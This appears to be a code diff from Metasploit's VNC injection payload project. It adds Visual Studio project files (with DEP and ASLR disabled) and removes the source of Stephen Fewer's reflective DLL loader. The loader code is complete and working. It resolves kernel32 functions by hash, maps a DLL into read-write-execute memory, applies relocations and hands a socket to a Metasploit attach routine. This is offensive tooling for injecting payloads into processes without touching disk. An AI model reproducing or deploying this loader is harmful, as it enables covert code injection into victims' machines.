<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;LOADER_EXPORTS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<AdditionalIncludeDirectories>..\..\ReflectiveDLLInjection\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<FunctionLevelLinking>true</FunctionLevelLinking>
<PrecompiledHeader />
<WarningLevel>Level3</WarningLevel>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<CompileAs>CompileAsC</CompileAs>
</ClCompile>
<ResourceCompile>
<PreprocessorDefinitions>_X64_;_USING_V110_SDK71_;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
<Link>
<AdditionalDependencies>Advapi32.lib;ws2_32.lib;User32.lib;%(AdditionalDependencies)</AdditionalDependencies>
<OutputFile>$(OutDir)$(TargetName)$(TargetExt)</OutputFile>
<GenerateDebugInformation>false</GenerateDebugInformation>
<SubSystem>Windows</SubSystem>
<OptimizeReferences>true</OptimizeReferences>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<RandomizedBaseAddress>false</RandomizedBaseAddress>
<DataExecutionPrevention>false</DataExecutionPrevention>
<TargetMachine>MachineX64</TargetMachine>
</Link>
<PostBuildEvent>
<Command>editbin.exe /OSVERSION:5.0 /SUBSYSTEM:WINDOWS,5.1 "$(TargetDir)$(TargetFileName)" &gt; NUL
copy /y "$(TargetDir)$(TargetFileName)" "..\..\..\..\data\"</Command>
</PostBuildEvent>
</ItemDefinitionGroup>
<ItemGroup>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c" />
<ClCompile Include="context.c" />
<ClCompile Include="loader.c" />
<ClCompile Include="inject.c" />
<ClCompile Include="ps.c" />
<ClCompile Include="session.c" />
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h" />
<ClInclude Include="loader.h" />
<ClInclude Include="inject.h" />
<ClInclude Include="ps.h" />
<ClInclude Include="session.h" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc" />
</ItemGroup>
<ItemGroup>
<ProjectReference Include="..\winvnc\WinVNC.vcxproj">
<Project>{ea6a09ac-04bb-423d-8842-ca48df901058}</Project>
<ReferenceOutputAssembly>false</ReferenceOutputAssembly>
</ProjectReference>
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>

View File

@ -0,0 +1,65 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Source Files\core">
<UniqueIdentifier>{7c56685d-83b5-4541-b5dd-a620ffe19b23}</UniqueIdentifier>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Header Files\core">
<UniqueIdentifier>{6b6dd5ba-1f40-449f-a55b-7180bb0793a0}</UniqueIdentifier>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClCompile Include="context.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="loader.c">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="inject.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="ps.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="session.c">
<Filter>Source Files\core</Filter>
</ClCompile>
<ClCompile Include="..\..\ReflectiveDLLInjection\inject\src\LoadLibraryR.c">
<Filter>Source Files\core</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ClInclude Include="context.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="loader.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="inject.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="ps.h">
<Filter>Header Files\core</Filter>
</ClInclude>
<ClInclude Include="session.h">
<Filter>Header Files\core</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="loader.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>

View File

@ -1,53 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
#define _VNCDLL_LOADER_REFLECTIVEDLLINJECTION_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
// we declare some common stuff in here...
#define DLL_METASPLOIT_ATTACH 4
#define DLL_METASPLOIT_DETACH 5
#define DLL_QUERY_HMODULE 6
#define DEREF( name )*(UINT_PTR *)(name)
#define DEREF_64( name )*(DWORD64 *)(name)
#define DEREF_32( name )*(DWORD *)(name)
#define DEREF_16( name )*(WORD *)(name)
#define DEREF_8( name )*(BYTE *)(name)
typedef DWORD (WINAPI * REFLECTIVELOADER)( VOID );
typedef BOOL (WINAPI * DLLMAIN)( HINSTANCE, DWORD, LPVOID );
#define DLLEXPORT __declspec( dllexport )
//===============================================================================================//
#endif
//===============================================================================================//

View File

@ -1,457 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#include "ReflectiveLoader.h"
//===============================================================================================//
// Our loader will set this to a pseudo correct HINSTANCE/HMODULE value
HINSTANCE hAppInstance = NULL;
//===============================================================================================//
#ifdef _WIN64
#pragma intrinsic( _ReturnAddress )
UINT_PTR eip( VOID ) { return (UINT_PTR)_ReturnAddress(); }
#endif
//===============================================================================================//
/*
* Use Reflective DLL Injection.
*/
#define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
#define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// Note 1: If you want to have your own DllMain, define REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN,
// otherwise the DllMain at the end of this file will be used.
// Note 2: If you are injecting the DLL via LoadRemoteLibraryR, define REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR,
// otherwise it is assumed you are calling the ReflectiveLoader via a stub.
// This is our position independent reflective DLL loader/injector
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( LPVOID lpParameter )
#else
DLLEXPORT UINT_PTR WINAPI ReflectiveLoader( VOID )
#endif
{
// the functions we need
LOADLIBRARYA pLoadLibraryA;
GETPROCADDRESS pGetProcAddress;
VIRTUALALLOC pVirtualAlloc;
USHORT usCounter;
// the initial location of this image in memory
UINT_PTR uiLibraryAddress;
// the kernels base address and later this images newly loaded base address
UINT_PTR uiBaseAddress;
// variables for processing the kernels export table
UINT_PTR uiAddressArray;
UINT_PTR uiNameArray;
UINT_PTR uiExportDir;
UINT_PTR uiNameOrdinals;
DWORD dwHashValue;
// variables for loading this image
UINT_PTR uiHeaderValue;
UINT_PTR uiValueA;
UINT_PTR uiValueB;
UINT_PTR uiValueC;
UINT_PTR uiValueD;
// STEP 0: calculate our images current base address
// we will start searching backwards from our current EIP
#ifdef _WIN64
uiLibraryAddress = eip();
#else
__asm call geteip
__asm geteip: pop uiLibraryAddress
#endif
// loop through memory backwards searching for our images base address
// we dont need SEH style search as we shouldnt generate any access violations with this
while( TRUE )
{
if( ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_magic == IMAGE_DOS_SIGNATURE )
{
uiHeaderValue = ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// some x64 dll's can trigger a bogus signature (IMAGE_DOS_SIGNATURE == 'POP r10'),
// we sanity check the e_lfanew with an upper threshold value of 1024 to avoid problems.
if( uiHeaderValue >= sizeof(IMAGE_DOS_HEADER) && uiHeaderValue < 1024 )
{
uiHeaderValue += uiLibraryAddress;
// break if we have found a valid MZ/PE header
if( ((PIMAGE_NT_HEADERS)uiHeaderValue)->Signature == IMAGE_NT_SIGNATURE )
break;
}
}
uiLibraryAddress--;
}
// STEP 1: process the kernels exports for the functions our loader needs...
// get the Process Enviroment Block
#ifdef _WIN64
uiBaseAddress = __readgsqword( 0x60 );
#else
uiBaseAddress = __readfsdword( 0x30 );
#endif
// get the processes loaded modules. ref: http://msdn.microsoft.com/en-us/library/aa813708(VS.85).aspx
uiBaseAddress = (UINT_PTR)((_PPEB)uiBaseAddress)->pLdr;
// get the first entry of the InMemoryOrder module list
uiValueA = (UINT_PTR)((PPEB_LDR_DATA)uiBaseAddress)->InMemoryOrderModuleList.Flink;
while( uiValueA )
{
// get pointer to current modules name (unicode string)
uiValueB = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.pBuffer;
// set bCounter to the length for the loop
usCounter = ((PLDR_DATA_TABLE_ENTRY)uiValueA)->BaseDllName.Length;
// clear uiValueC which will store the hash of the module name
uiValueC = 0;
// compute the hash of the module name...
do
{
uiValueC = ror( (DWORD)uiValueC );
// normalize to uppercase if the madule name is in lowercase
if( *((BYTE *)uiValueB) >= 'a' )
uiValueC += *((BYTE *)uiValueB) - 0x20;
else
uiValueC += *((BYTE *)uiValueB);
uiValueB++;
} while( --usCounter );
// compare the hash with that of kernel32.dll
if( (DWORD)uiValueC == KERNEL32DLL_HASH )
{
// get this modules base address
uiBaseAddress = (UINT_PTR)((PLDR_DATA_TABLE_ENTRY)uiValueA)->DllBase;
break;
}
// get the next entry
uiValueA = DEREF( uiValueA );
}
// get the VA of the modules NT Header
uiExportDir = uiBaseAddress + ((PIMAGE_DOS_HEADER)uiBaseAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of name pointers
uiNameArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNames );
// get the VA for the array of name ordinals
uiNameOrdinals = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfNameOrdinals );
usCounter = 3;
// loop while we still have imports to find
while( usCounter > 0 )
{
// compute the hash values for this function name
dwHashValue = hash( (char *)( uiBaseAddress + DEREF_32( uiNameArray ) ) );
// if we have found a function we want we get its virtual address
if( dwHashValue == LOADLIBRARYA_HASH || dwHashValue == GETPROCADDRESS_HASH || dwHashValue == VIRTUALALLOC_HASH )
{
// get the VA for the array of addresses
uiAddressArray = ( uiBaseAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use this functions name ordinal as an index into the array of name pointers
uiAddressArray += ( DEREF_16( uiNameOrdinals ) * sizeof(DWORD) );
// store this functions VA
if( dwHashValue == LOADLIBRARYA_HASH )
pLoadLibraryA = (LOADLIBRARYA)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == GETPROCADDRESS_HASH )
pGetProcAddress = (GETPROCADDRESS)( uiBaseAddress + DEREF_32( uiAddressArray ) );
else if( dwHashValue == VIRTUALALLOC_HASH )
pVirtualAlloc = (VIRTUALALLOC)( uiBaseAddress + DEREF_32( uiAddressArray ) );
// decrement our counter
usCounter--;
}
// get the next exported function name
uiNameArray += sizeof(DWORD);
// get the next exported function name ordinal
uiNameOrdinals += sizeof(WORD);
}
// STEP 2: load our image into a new permanent location in memory...
// get the VA of the NT Header for the PE to be loaded
uiHeaderValue = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// allocate all the memory for the DLL to be loaded into. we can load at any address because we will
// relocate the image. Also zeros all memory and marks it as READ, WRITE and EXECUTE to avoid any problems.
uiBaseAddress = (UINT_PTR)pVirtualAlloc( NULL, ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfImage, MEM_RESERVE|MEM_COMMIT, PAGE_EXECUTE_READWRITE );
// we must now copy over the headers
uiValueA = ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.SizeOfHeaders;
uiValueB = uiLibraryAddress;
uiValueC = uiBaseAddress;
__movsb( (PBYTE)uiValueC, (PBYTE)uiValueB, uiValueA );
// STEP 3: load in all of our sections...
// uiValueA = the VA of the first section
uiValueA = ( (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader + ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.SizeOfOptionalHeader );
// itterate through all sections, loading them into memory.
while( ((PIMAGE_NT_HEADERS)uiHeaderValue)->FileHeader.NumberOfSections-- )
{
// uiValueB is the VA for this section
uiValueB = ( uiBaseAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->VirtualAddress );
// uiValueC if the VA for this sections data
uiValueC = ( uiLibraryAddress + ((PIMAGE_SECTION_HEADER)uiValueA)->PointerToRawData );
// copy the section over
uiValueD = ((PIMAGE_SECTION_HEADER)uiValueA)->SizeOfRawData;
__movsb( (PBYTE)uiValueB, (PBYTE)uiValueC, uiValueD );
// get the VA of the next section
uiValueA += sizeof( IMAGE_SECTION_HEADER );
}
// STEP 4: process our images import table...
// uiValueB = the address of the import directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_IMPORT ];
// we assume their is an import table to process
// uiValueC is the first entry in the import table
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all imports
while( ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name )
{
// use LoadLibraryA to load the imported module into memory
uiLibraryAddress = (UINT_PTR)pLoadLibraryA( (LPCSTR)( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->Name ) );
// uiValueD = VA of the OriginalFirstThunk
uiValueD = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->OriginalFirstThunk );
// uiValueA = VA of the IAT (via first thunk not origionalfirstthunk)
uiValueA = ( uiBaseAddress + ((PIMAGE_IMPORT_DESCRIPTOR)uiValueC)->FirstThunk );
// itterate through all imported functions, importing by ordinal if no name present
while( DEREF(uiValueA) )
{
// sanity check uiValueD as some compilers only import by FirstThunk
if( uiValueD && ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal & IMAGE_ORDINAL_FLAG )
{
// get the VA of the modules NT Header
uiExportDir = uiLibraryAddress + ((PIMAGE_DOS_HEADER)uiLibraryAddress)->e_lfanew;
// uiNameArray = the address of the modules export directory entry
uiNameArray = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiExportDir)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXPORT ];
// get the VA of the export directory
uiExportDir = ( uiLibraryAddress + ((PIMAGE_DATA_DIRECTORY)uiNameArray)->VirtualAddress );
// get the VA for the array of addresses
uiAddressArray = ( uiLibraryAddress + ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->AddressOfFunctions );
// use the import ordinal (- export ordinal base) as an index into the array of addresses
uiAddressArray += ( ( IMAGE_ORDINAL( ((PIMAGE_THUNK_DATA)uiValueD)->u1.Ordinal ) - ((PIMAGE_EXPORT_DIRECTORY )uiExportDir)->Base ) * sizeof(DWORD) );
// patch in the address for this imported function
DEREF(uiValueA) = ( uiLibraryAddress + DEREF_32(uiAddressArray) );
}
else
{
// get the VA of this functions import by name struct
uiValueB = ( uiBaseAddress + DEREF(uiValueA) );
// use GetProcAddress and patch in the address for this imported function
DEREF(uiValueA) = (UINT_PTR)pGetProcAddress( (HMODULE)uiLibraryAddress, (LPCSTR)((PIMAGE_IMPORT_BY_NAME)uiValueB)->Name );
}
// get the next imported function
uiValueA += sizeof( UINT_PTR );
if( uiValueD )
uiValueD += sizeof( UINT_PTR );
}
// get the next import
uiValueC += sizeof( IMAGE_IMPORT_DESCRIPTOR );
}
// STEP 5: process all of our images relocations...
// calculate the base address delta and perform relocations (even if we load at desired image base)
uiLibraryAddress = uiBaseAddress - ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.ImageBase;
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_BASERELOC ];
// check if their are any relocations present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// uiValueC is now the first entry (IMAGE_BASE_RELOCATION)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// and we itterate through all entries...
while( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock )
{
// uiValueA = the VA for this relocation block
uiValueA = ( uiBaseAddress + ((PIMAGE_BASE_RELOCATION)uiValueC)->VirtualAddress );
// uiValueB = number of entries in this relocation block
uiValueB = ( ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock - sizeof(IMAGE_BASE_RELOCATION) ) / sizeof( IMAGE_RELOC );
// uiValueD is now the first entry in the current relocation block
uiValueD = uiValueC + sizeof(IMAGE_BASE_RELOCATION);
// we itterate through all the entries in the current block...
while( uiValueB-- )
{
// perform the relocation, skipping IMAGE_REL_BASED_ABSOLUTE as required.
// we dont use a switch statement to avoid the compiler building a jump table
// which would not be very position independent!
if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_DIR64 )
*(UINT_PTR *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGHLOW )
*(DWORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += (DWORD)uiLibraryAddress;
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_HIGH )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += HIWORD(uiLibraryAddress);
else if( ((PIMAGE_RELOC)uiValueD)->type == IMAGE_REL_BASED_LOW )
*(WORD *)(uiValueA + ((PIMAGE_RELOC)uiValueD)->offset) += LOWORD(uiLibraryAddress);
// get the next entry in the current relocation block
uiValueD += sizeof( IMAGE_RELOC );
}
// get the next entry in the relocation directory
uiValueC = uiValueC + ((PIMAGE_BASE_RELOCATION)uiValueC)->SizeOfBlock;
}
}
// STEP 6: process the images exception directory if it has one (PE32+ for x64)
/*
// uiValueB = the address of the relocation directory
uiValueB = (UINT_PTR)&((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.DataDirectory[ IMAGE_DIRECTORY_ENTRY_EXCEPTION ];
// check if their are any exception etries present
if( ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size )
{
// get the number of entries
uiValueA = ((PIMAGE_DATA_DIRECTORY)uiValueB)->Size / sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
// uiValueC is now the first entry (IMAGE_RUNTIME_FUNCTION_ENTRY)
uiValueC = ( uiBaseAddress + ((PIMAGE_DATA_DIRECTORY)uiValueB)->VirtualAddress );
// itterate through all entries
while( uiValueA-- )
{
//((IMAGE_RUNTIME_FUNCTION_ENTRY)uiValueC).BeginAddress
// get the next entry
uiValueC += sizeof( IMAGE_RUNTIME_FUNCTION_ENTRY );
}
}
*/
// STEP 7: call our images entry point
// uiValueA = the VA of our newly loaded DLL/EXE's entry point
uiValueA = ( uiBaseAddress + ((PIMAGE_NT_HEADERS)uiHeaderValue)->OptionalHeader.AddressOfEntryPoint );
// call our respective entry point, fudging our hInstance value
#ifdef REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR
// if we are injecting a DLL via LoadRemoteLibraryR we call DllMain and pass in our parameter (via the DllMain lpReserved parameter)
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, lpParameter );
#else
// if we are injecting an DLL via a stub we call DllMain with no parameter
((DLLMAIN)uiValueA)( (HINSTANCE)uiBaseAddress, DLL_PROCESS_ATTACH, NULL );
#endif
// STEP 8: return our new entry point address so whatever called us can call DLL_METASPLOIT_ATTACH/DLL_METASPLOIT_DETACH
return uiValueA;
}
//===============================================================================================//
#ifndef REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN
// you must implement this function...
extern DWORD DLLEXPORT Init( SOCKET socket );
BOOL MetasploitDllAttach( SOCKET socket )
{
Init( socket );
return TRUE;
}
BOOL MetasploitDllDetach( DWORD dwExitFunc )
{
switch( dwExitFunc )
{
case EXITFUNC_SEH:
SetUnhandledExceptionFilter( NULL );
break;
case EXITFUNC_THREAD:
ExitThread( 0 );
break;
case EXITFUNC_PROCESS:
ExitProcess( 0 );
break;
default:
break;
}
return TRUE;
}
BOOL WINAPI DllMain( HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved )
{
BOOL bReturnValue = TRUE;
switch( dwReason )
{
case DLL_METASPLOIT_ATTACH:
bReturnValue = MetasploitDllAttach( (SOCKET)lpReserved );
break;
case DLL_METASPLOIT_DETACH:
bReturnValue = MetasploitDllDetach( (DWORD)lpReserved );
break;
case DLL_QUERY_HMODULE:
if( lpReserved != NULL )
*(HMODULE *)lpReserved = hAppInstance;
break;
case DLL_PROCESS_ATTACH:
hAppInstance = hinstDLL;
break;
case DLL_PROCESS_DETACH:
case DLL_THREAD_ATTACH:
case DLL_THREAD_DETACH:
break;
}
return bReturnValue;
}
#endif
//===============================================================================================//

View File

@ -1,197 +0,0 @@
//===============================================================================================//
// Copyright (c) 2009, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
// All rights reserved.
//
// Redistribution and use in source and binary forms, with or without modification, are permitted
// provided that the following conditions are met:
//
// * Redistributions of source code must retain the above copyright notice, this list of
// conditions and the following disclaimer.
//
// * Redistributions in binary form must reproduce the above copyright notice, this list of
// conditions and the following disclaimer in the documentation and/or other materials provided
// with the distribution.
//
// * Neither the name of Harmony Security nor the names of its contributors may be used to
// endorse or promote products derived from this software without specific prior written permission.
//
// THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
// IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
// FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
// CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
// CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
// SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
// THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
// OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
// POSSIBILITY OF SUCH DAMAGE.
//===============================================================================================//
#ifndef _VNCDLL_LOADER_REFLECTIVELOADER_H
#define _VNCDLL_LOADER_REFLECTIVELOADER_H
//===============================================================================================//
#define WIN32_LEAN_AND_MEAN
#include <windows.h>
#include <Winsock2.h>
#include <intrin.h>
#include "ReflectiveDLLInjection.h"
#define EXITFUNC_SEH 0xEA320EFE
#define EXITFUNC_THREAD 0x0A2A1DE0
#define EXITFUNC_PROCESS 0x56A2B5F0
typedef HMODULE (WINAPI * LOADLIBRARYA)( LPCSTR );
typedef FARPROC (WINAPI * GETPROCADDRESS)( HMODULE, LPCSTR );
typedef LPVOID (WINAPI * VIRTUALALLOC)( LPVOID, SIZE_T, DWORD, DWORD );
#define KERNEL32DLL_HASH 0x6A4ABC5B
#define LOADLIBRARYA_HASH 0xEC0E4E8E
#define GETPROCADDRESS_HASH 0x7C0DFCAA
#define VIRTUALALLOC_HASH 0x91AFCA54
#define HASH_KEY 13
//===============================================================================================//
#pragma intrinsic( _rotr )
__forceinline DWORD ror( DWORD d )
{
return _rotr( d, HASH_KEY );
}
__forceinline DWORD hash( char * c )
{
register DWORD h = 0;
do
{
h = ror( h );
h += *c;
} while( *++c );
return h;
}
//===============================================================================================//
typedef struct _UNICODE_STR
{
USHORT Length;
USHORT MaximumLength;
PWSTR pBuffer;
} UNICODE_STR, *PUNICODE_STR;
// WinDbg> dt -v ntdll!_LDR_DATA_TABLE_ENTRY
//__declspec( align(8) )
typedef struct _LDR_DATA_TABLE_ENTRY
{
//LIST_ENTRY InLoadOrderLinks; // As we search from PPEB_LDR_DATA->InMemoryOrderModuleList we dont use the first entry.
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
PVOID DllBase;
PVOID EntryPoint;
ULONG SizeOfImage;
UNICODE_STR FullDllName;
UNICODE_STR BaseDllName;
ULONG Flags;
SHORT LoadCount;
SHORT TlsIndex;
LIST_ENTRY HashTableEntry;
ULONG TimeDateStamp;
} LDR_DATA_TABLE_ENTRY, *PLDR_DATA_TABLE_ENTRY;
// WinDbg> dt -v ntdll!_PEB_LDR_DATA
typedef struct _PEB_LDR_DATA //, 7 elements, 0x28 bytes
{
DWORD dwLength;
DWORD dwInitialized;
LPVOID lpSsHandle;
LIST_ENTRY InLoadOrderModuleList;
LIST_ENTRY InMemoryOrderModuleList;
LIST_ENTRY InInitializationOrderModuleList;
LPVOID lpEntryInProgress;
} PEB_LDR_DATA, * PPEB_LDR_DATA;
// WinDbg> dt -v ntdll!_PEB_FREE_BLOCK
typedef struct _PEB_FREE_BLOCK // 2 elements, 0x8 bytes
{
struct _PEB_FREE_BLOCK * pNext;
DWORD dwSize;
} PEB_FREE_BLOCK, * PPEB_FREE_BLOCK;
// struct _PEB is defined in Winternl.h but it is incomplete
// WinDbg> dt -v ntdll!_PEB
